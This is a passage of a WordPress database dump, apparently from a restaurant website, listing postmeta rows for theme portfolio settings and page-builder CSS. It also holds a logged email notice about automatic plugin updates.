Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(46928,3096,'mkdf_portfolio_single_template_meta','slider'),(46929,3096,'_dp_original','141'),(46930,3096,'_wp_old_slug','h2-3'),(46931,3097,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46932,3097,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46933,3097,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46934,3097,'_thumbnail_id','1057'),(46935,3097,'mkdf_page_content_behind_header_meta','no'),(46936,3097,'mkdf_page_content_padding','115px 0 100px 0'),(46937,3097,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(46938,3097,'portfolio_single_back_to_link','84'),(46939,3097,'mkdf_disable_vertical_header_background_image_meta','no'),(46940,3097,'mkdf_disable_header_widget_areas_meta','no'),(46941,3097,'slide_template','default'),(46942,3097,'_wpb_vc_js_status','true'),(46943,3097,'mkdf-portfolio-image-gallery','565,566,567'),(46944,3097,'mkdf_portfolio_single_template_meta','small-slider'),(46945,3097,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(46946,3097,'_dp_original','568'),(46947,3097,'_wp_old_slug','h2-2'),(46948,3098,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46949,3098,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46950,3098,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46951,3098,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46952,3098,'mkdf_page_content_behind_header_meta','no'),(46953,3098,'mkdf_page_content_padding','115px 0 100px 0'),(46954,3098,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(46955,3098,'portfolio_single_back_to_link','84'),(46956,3098,'mkdf_disable_vertical_header_background_image_meta','no'),(46957,3098,'mkdf_disable_header_widget_areas_meta','no'),(46958,3098,'slide_template','default'),(46959,3098,'_wpb_vc_js_status','true'),(46960,3098,'mkdf-portfolio-image-gallery','567,566,565'),(46961,3098,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(46962,3098,'mkdf_portfolio_single_template_meta','gallery'),(46963,3098,'_thumbnail_id','1056'),(46964,3098,'_dp_original','580'),(46965,3098,'_wp_old_slug','h2-1'),(46966,3099,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46967,3099,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46968,3099,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46969,3099,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52230,4368,'_menu_item_xfn',''),(46971,3099,'mkdf_page_content_behind_header_meta','no'),(46972,3099,'mkdf_page_content_padding','115px 0 100px 0'),(46973,3099,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(46974,3099,'portfolio_single_back_to_link','1008'),(46975,3099,'mkdf_disable_vertical_header_background_image_meta','no'),(46976,3099,'mkdf_disable_header_widget_areas_meta','no'),(46977,3099,'slide_template','default'),(46978,3099,'_wpb_vc_js_status','true'),(46979,3099,'mkdf-portfolio-image-gallery','567,566,565'),(46980,3099,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(46981,3099,'mkdf_portfolio_single_template_meta','small-images'),(46982,3099,'_wp_old_slug','h1-2-2'),(46983,3099,'_wp_old_slug','h2-1'),(46984,3099,'_dp_original','933'),(46985,3099,'_wp_old_slug','h7-4'),(46986,3100,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46987,3100,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46988,3100,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46989,3100,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46990,3100,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(46991,3100,'mkdf_page_content_behind_header_meta','no'),(46992,3100,'mkdf_page_content_padding','115px 0 100px 0'),(46993,3100,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(46994,3100,'portfolio_single_back_to_link','1008'),(46995,3100,'mkdf_disable_vertical_header_background_image_meta','no'),(46996,3100,'mkdf_disable_header_widget_areas_meta','no'),(46997,3100,'slide_template','default'),(46998,3100,'_wpb_vc_js_status','true'),(46999,3100,'mkdf-portfolio-image-gallery','567,566,565'),(47000,3100,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(47001,3100,'mkdf_portfolio_single_template_meta','gallery'),(52226,4368,'_menu_item_object_id','4368'),(47003,3100,'_dp_original','936'),(47004,3100,'_wp_old_slug','h7-1'),(47005,3100,'_wp_old_slug','vegetable-cream-soup__trashed'),(47006,3101,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47007,3101,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47008,3101,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47009,3101,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47010,3101,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47011,3101,'mkdf_page_content_behind_header_meta','no'),(47012,3101,'mkdf_page_content_padding','115px 0 100px 0'),(47013,3101,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(47014,3101,'portfolio_single_back_to_link','1008'),(47015,3101,'mkdf_disable_vertical_header_background_image_meta','no'),(47016,3101,'mkdf_disable_header_widget_areas_meta','no'),(47017,3101,'slide_template','default'),(47018,3101,'_wpb_vc_js_status','true'),(47019,3101,'mkdf-portfolio-image-gallery','567,566,565'),(47020,3101,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(47021,3101,'mkdf_portfolio_single_template_meta','slider'),(47022,3101,'_thumbnail_id','1030'),(47023,3101,'_dp_original','1021'),(47024,3101,'_wp_old_slug','h7-5'),(47025,3102,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47026,3102,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47027,3102,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47028,3102,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47029,3102,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47031,3102,'mkdf_page_content_behind_header_meta','no'),(47032,3102,'mkdf_page_content_padding','115px 0 100px 0'),(47033,3102,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(47034,3102,'portfolio_single_back_to_link','1008'),(47035,3102,'mkdf_disable_vertical_header_background_image_meta','no'),(47036,3102,'mkdf_disable_header_widget_areas_meta','no'),(47037,3102,'slide_template','default'),(47038,3102,'_wpb_vc_js_status','true'),(47039,3102,'mkdf-portfolio-image-gallery','567,566,565'),(47040,3102,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(47041,3102,'mkdf_portfolio_single_template_meta','small-images'),(47042,3102,'_wp_old_slug','h1-2-2'),(47043,3102,'_wp_old_slug','h2-1'),(47044,3102,'_dp_original','1019'),(47045,3102,'_wp_old_slug','h7-6'),(47046,2344,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47047,2344,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47048,2344,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47049,2344,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47050,2344,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47051,2344,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52148,4359,'_menu_item_url','#'),(47053,2344,'mkdf_page_content_behind_header_meta','no'),(47054,2344,'mkdf_page_content_padding','115px 0 100px 0'),(47055,2344,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(47056,2344,'portfolio_single_back_to_link','1008'),(47057,2344,'mkdf_disable_vertical_header_background_image_meta','no'),(47058,2344,'mkdf_disable_header_widget_areas_meta','no'),(47059,2344,'slide_template','default'),(47060,2344,'_wpb_vc_js_status','true'),(47061,2344,'mkdf-portfolio-image-gallery','567,566,565'),(47062,2344,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(47063,2344,'mkdf_portfolio_single_template_meta','small-images'),(47064,2344,'_wp_old_slug','h1-2-2'),(47065,2344,'_wp_old_slug','h2-1'),(47066,2344,'_wp_old_slug','h7-6'),(47067,2344,'_dp_original','1048'),(47068,2345,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47069,2345,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47070,2345,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47071,2345,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47072,2345,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47074,2345,'mkdf_page_content_behind_header_meta','no'),(47075,2345,'mkdf_page_content_padding','115px 0 100px 0'),(47076,2345,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(47077,2345,'portfolio_single_back_to_link','1008'),(47078,2345,'mkdf_disable_vertical_header_background_image_meta','no'),(47079,2345,'mkdf_disable_header_widget_areas_meta','no'),(47080,2345,'slide_template','default'),(47081,2345,'_wpb_vc_js_status','true'),(47082,2345,'mkdf-portfolio-image-gallery','565,566,567'),(47083,2345,'mkdf_portfolio_single_template_meta','small-slider'),(47084,2345,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(47085,2345,'_wp_old_slug','h7-2'),(47086,2345,'_dp_original','1020'),(47087,2898,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47088,2898,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47089,2898,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47090,2898,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47091,2898,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47092,2898,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47093,2898,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47094,2898,'mkdf_page_content_behind_header_meta','no'),(47095,2898,'mkdf_page_content_padding','115px 0 100px 0'),(47096,2898,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(47097,2898,'portfolio_single_back_to_link','569'),(47098,2898,'mkdf_disable_vertical_header_background_image_meta','no'),(47099,2898,'mkdf_disable_header_widget_areas_meta','no'),(47100,2898,'slide_template','default'),(47101,2898,'_wpb_vc_js_status','true'),(47102,2898,'mkdf-portfolio-image-gallery','567,566,565'),(47103,2898,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(47104,2898,'mkdf_portfolio_single_template_meta','small-slider'),(47105,2898,'_thumbnail_id','594'),(47106,2898,'_wp_old_slug','h8-6'),(47107,2898,'_dp_original','592'),(47108,2899,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47109,2899,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47110,2899,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47111,2899,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47112,2899,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47113,2899,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47114,2899,'_thumbnail_id','591'),(47115,2899,'mkdf_page_content_behind_header_meta','no'),(47116,2899,'mkdf_page_content_padding','115px 0 100px 0'),(47117,2899,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(47118,2899,'portfolio_single_back_to_link','569'),(47119,2899,'mkdf_disable_vertical_header_background_image_meta','no'),(47120,2899,'mkdf_disable_header_widget_areas_meta','no'),(47121,2899,'slide_template','default'),(47122,2899,'_wpb_vc_js_status','true'),(47123,2899,'mkdf-portfolio-image-gallery','567,566,565'),(47124,2899,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(47125,2899,'mkdf_portfolio_single_template_meta','slider'),(47126,2899,'_wp_old_slug','h8-5'),(47127,2899,'_dp_original','590'),(47128,2900,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47129,2900,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47130,2900,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47131,2900,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47132,2900,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47133,2900,'_thumbnail_id','589'),(47134,2900,'mkdf_page_content_behind_header_meta','no'),(47135,2900,'mkdf_page_content_padding','115px 0 100px 0'),(47136,2900,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(47137,2900,'portfolio_single_back_to_link','569'),(47138,2900,'mkdf_disable_vertical_header_background_image_meta','no'),(47139,2900,'mkdf_disable_header_widget_areas_meta','no'),(47140,2900,'slide_template','default'),(47141,2900,'_wpb_vc_js_status','true'),(47142,2900,'mkdf-portfolio-image-gallery','567,566,565'),(47143,2900,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(47144,2900,'mkdf_portfolio_single_template_meta','masonry'),(47145,2900,'_wp_old_slug','h8-4'),(47146,2900,'_dp_original','588'),(47147,2901,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47148,2901,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47149,2901,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47150,2901,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47151,2901,'_thumbnail_id','584'),(47152,2901,'mkdf_page_content_behind_header_meta','no'),(47153,2901,'mkdf_page_content_padding','115px 0 100px 0'),(47154,2901,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(47155,2901,'portfolio_single_back_to_link','569'),(47156,2901,'mkdf_disable_vertical_header_background_image_meta','no'),(47157,2901,'mkdf_disable_header_widget_areas_meta','no'),(47158,2901,'slide_template','default'),(47159,2901,'_wpb_vc_js_status','true'),(47160,2901,'mkdf-portfolio-image-gallery','567,566,565'),(47161,2901,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(47162,2901,'mkdf_portfolio_single_template_meta','small-images'),(47163,2901,'_wp_old_slug','h8-3'),(47164,2901,'_dp_original','583'),(47165,2902,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47166,2902,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47167,2902,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47168,2902,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47169,2902,'mkdf_page_content_behind_header_meta','no'),(47170,2902,'mkdf_page_content_padding','115px 0 100px 0'),(47171,2902,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(47172,2902,'portfolio_single_back_to_link','569'),(47173,2902,'mkdf_disable_vertical_header_background_image_meta','no'),(47174,2902,'mkdf_disable_header_widget_areas_meta','no'),(47175,2902,'slide_template','default'),(47176,2902,'_wpb_vc_js_status','true'),(47177,2902,'mkdf-portfolio-image-gallery','567,566,565'),(47178,2902,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(47179,2902,'mkdf_portfolio_single_template_meta','gallery'),(47181,2902,'_wp_old_slug','h8-2'),(47182,2902,'_dp_original','580'),(47183,2903,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47184,2903,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47185,2903,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47186,2903,'_thumbnail_id','571'),(47187,2903,'mkdf_page_content_behind_header_meta','no'),(47188,2903,'mkdf_page_content_padding','115px 0 100px 0'),(47189,2903,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(47190,2903,'portfolio_single_back_to_link','569'),(47191,2903,'mkdf_disable_vertical_header_background_image_meta','no'),(47192,2903,'mkdf_disable_header_widget_areas_meta','no'),(47193,2903,'slide_template','default'),(47194,2903,'_wpb_vc_js_status','true'),(47195,2903,'mkdf-portfolio-image-gallery','565,566,567'),(47196,2903,'mkdf_portfolio_single_template_meta','small-slider'),(47197,2903,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(47198,2903,'_wp_old_slug','h8-1'),(47199,2903,'_dp_original','568'),(47200,2930,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47201,2930,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47202,2930,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47203,2930,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47204,2930,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47205,2930,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(52248,4370,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(47207,2930,'mkdf_page_content_behind_header_meta','no'),(47208,2930,'mkdf_page_content_padding','115px 0 100px 0'),(47209,2930,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(47210,2930,'portfolio_single_back_to_link','1008'),(47211,2930,'mkdf_disable_vertical_header_background_image_meta','no'),(47212,2930,'mkdf_disable_header_widget_areas_meta','no'),(47213,2930,'slide_template','default'),(47214,2930,'_wpb_vc_js_status','true'),(47215,2930,'mkdf-portfolio-image-gallery','565,566,567'),(47216,2930,'mkdf_portfolio_single_template_meta','small-slider'),(47217,2930,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(47218,2930,'_wp_old_slug','h7-2'),(47219,2930,'_dp_original','2345'),(47220,1,'_mkdf-like','0'),(58458,4603,'original_subject','[Sol Y Mar] Some plugins were automatically updated'),(58457,4603,'original_to','webmaster@baldisserri.com'),(58456,4603,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(58455,4603,'to_header','webmaster@baldisserri.com'),(58454,4603,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(58452,4603,'solution','All good, mail sent.'),(58453,4603,'success','1'),(58449,4598,'mkdf_show_title_area_meta','no'),(58459,4603,'original_message','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Popup Builder (from version 3.72 to 3.73)\n- Really Simple SSL (from version 4.0.6 to 4.0.7)\n- Yoast SEO (from version 15.6.2 to 15.7)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team'),(58448,4598,'_wpb_shortcodes_custom_css','.vc_custom_1534503338704{padding-top: 150px !important;}.vc_custom_1536913540691{padding-top: 130px !important;}.vc_custom_1533133301464{margin-right: 13% !important;margin-left: 13% !important;}.vc_custom_1533133353763{padding-top: 100px !important;}.vc_custom_1537264652300{margin-top: -65px !important;margin-right: 0px !important;margin-left: 0px !important;}.vc_custom_1534502044211{padding-top: 100px !important;padding-bottom: 100px !important;}.vc_custom_1533132683543{padding-top: 100px !important;padding-bottom: 100px !important;}.vc_custom_1533736057368{margin-top: -375px !important;}.vc_custom_1533739073010{margin-top: -60px !important;}.vc_custom_1536047365110{margin-top: -160px !important;}.vc_custom_1537347303080{padding-top: 225px !important;padding-right: 12% !important;padding-bottom: 140px !important;padding-left: 12% !important;background-color: rgba(237,223,211,0.4) !important;*background-color: rgb(237,223,211) !important;}.vc_custom_1535119322528{margin-top: -20px !important;}.vc_custom_1533811367372{margin-top: -306px !important;}.vc_custom_1537280502379{padding-top: 13% !important;padding-bottom: 13% !important;}.vc_custom_1533809912373{margin-top: -86px !important;}.vc_custom_1533811471107{margin-top: -336px !important;}.vc_custom_1533812953034{margin-top: -123px !important;}.vc_custom_1537280521172{padding-top: 13% !important;padding-bottom: 13% !important;}.vc_custom_1534769660562{margin-top: -190px !important;}.vc_custom_1534769683015{margin-top: -374px !important;}.vc_custom_1534769891217{margin-left: -50px !important;}.vc_custom_1534769906135{margin-top: -62px !important;}.vc_custom_1536064601390{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1536064623328{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1536064682800{padding-right: 0px !important;padding-left: 0px !important;}.vc_custom_1536064749849{padding-right: 0px !important;padding-left: 0px !important;}'),(58447,4598,'mkdf_disable_header_widget_areas_meta','no'),(58446,4598,'mkdf_disable_vertical_header_background_image_meta','no'),(58445,4598,'mkdf_page_content_behind_header_meta','no'),(58444,4598,'_yoast_wpseo_estimated-reading-time-minutes',''),(58443,4598,'_yoast_wpseo_content_score','30'),(47262,1446,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47263,1446,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(47264,1446,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47265,1446,'slide_template','default'),(47266,1446,'mkdf_page_content_behind_header_meta','no'),(47267,1446,'mkdf_video_type_meta','social_networks'),(47268,1446,'mkdf_audio_type_meta','social_networks'),(47269,1446,'mkdf_disable_vertical_header_background_image_meta','no'),(47270,1446,'mkdf_disable_header_widget_areas_meta','no'),(47271,1446,'mkdf_show_title_area_meta','yes'),(47272,1446,'mkdf_title_area_type_meta','attika'),(47273,1446,'_mkdf-like','0'),(47275,1446,'_wpb_vc_js_status','true'),(47276,1446,'mkdf_page_content_padding','120px 0 0'),(47277,1446,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(47278,1446,'_dp_original','6'),(47279,1454,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47280,1454,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(47281,1454,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47282,1454,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47283,1454,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(47284,1454,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(47285,1454,'slide_template','default'),(47286,1454,'mkdf_page_content_behind_header_meta','no'),(47287,1454,'mkdf_video_type_meta','social_networks'),(47288,1454,'mkdf_audio_type_meta','social_networks'),(47289,1454,'mkdf_disable_vertical_header_background_image_meta','no'),(47290,1454,'mkdf_disable_header_widget_areas_meta','no'),(47291,1454,'mkdf_show_title_area_meta','yes'),(47292,1454,'mkdf_title_area_type_meta','attika'),(47293,1454,'_mkdf-like','0'),(52178,4362,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47295,1454,'_wpb_vc_js_status','true'),(47296,1454,'mkdf_page_content_padding','120px 0 0'),(47297,1454,'_dp_original','1446'),(47298,1454,'_wp_old_slug','strong-recepies-big-chefs-recomendations'),(47299,1459,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47300,1459,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(47301,1459,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47302,1459,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47303,1459,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47304,1459,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(47305,1459,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(47306,1459,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(47307,1459,'slide_template','default'),(47308,1459,'mkdf_page_content_behind_header_meta','no'),(47309,1459,'mkdf_video_type_meta','social_networks'),(47310,1459,'mkdf_audio_type_meta','social_networks'),(47311,1459,'mkdf_disable_vertical_header_background_image_meta','no'),(47312,1459,'mkdf_disable_header_widget_areas_meta','no'),(47313,1459,'mkdf_show_title_area_meta','yes'),(47314,1459,'mkdf_title_area_type_meta','attika'),(47315,1459,'_mkdf-like','0'),(52180,4363,'_menu_item_menu_item_parent','0'),(47317,1459,'_wpb_vc_js_status','true'),(47318,1459,'mkdf_page_content_padding','120px 0 0'),(47319,1459,'_dp_original','1454'),(47320,1459,'_wp_old_slug','new-places-of-attica'),(47321,1462,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47322,1462,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(47323,1462,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47324,1462,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47325,1462,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47326,1462,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(47327,1462,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(47328,1462,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(47329,1462,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(47330,1462,'_wpb_shortcodes_custom_css','.vc_custom_1532952122446{padding-top: 15px !important;}'),(47331,1462,'slide_template','default'),(47332,1462,'mkdf_page_content_behind_header_meta','no'),(47333,1462,'mkdf_video_type_meta','social_networks'),(47334,1462,'mkdf_audio_type_meta','social_networks'),(47335,1462,'mkdf_disable_vertical_header_background_image_meta','no'),(47336,1462,'mkdf_disable_header_widget_areas_meta','no'),(47337,1462,'mkdf_show_title_area_meta','yes'),(47338,1462,'mkdf_title_area_type_meta','attika'),(47339,1462,'_mkdf-like','0'),(52182,4363,'_menu_item_object','custom'),(47341,1462,'_wpb_vc_js_status','true'),(47342,1462,'mkdf_page_content_padding','120px 0 0'),(47343,1462,'_dp_original','1459'),(47344,1462,'_wp_old_slug','big-chefs-recomendations-strong-recepies'),(58442,4599,'_wpb_shortcodes_custom_css','.vc_custom_1534503338704{padding-top: 150px !important;}.vc_custom_1536913540691{padding-top: 130px !important;}.vc_custom_1533133301464{margin-right: 13% !important;margin-left: 13% !important;}.vc_custom_1533133353763{padding-top: 100px !important;}.vc_custom_1537264652300{margin-top: -65px !important;margin-right: 0px !important;margin-left: 0px !important;}.vc_custom_1534502044211{padding-top: 100px !important;padding-bottom: 100px !important;}.vc_custom_1533132683543{padding-top: 100px !important;padding-bottom: 100px !important;}.vc_custom_1533736057368{margin-top: -375px !important;}.vc_custom_1533739073010{margin-top: -60px !important;}.vc_custom_1536047365110{margin-top: -160px !important;}.vc_custom_1537347303080{padding-top: 225px !important;padding-right: 12% !important;padding-bottom: 140px !important;padding-left: 12% !important;background-color: rgba(237,223,211,0.4) !important;*background-color: rgb(237,223,211) !important;}.vc_custom_1535119322528{margin-top: -20px !important;}.vc_custom_1533811367372{margin-top: -306px !important;}.vc_custom_1537280502379{padding-top: 13% !important;padding-bottom: 13% 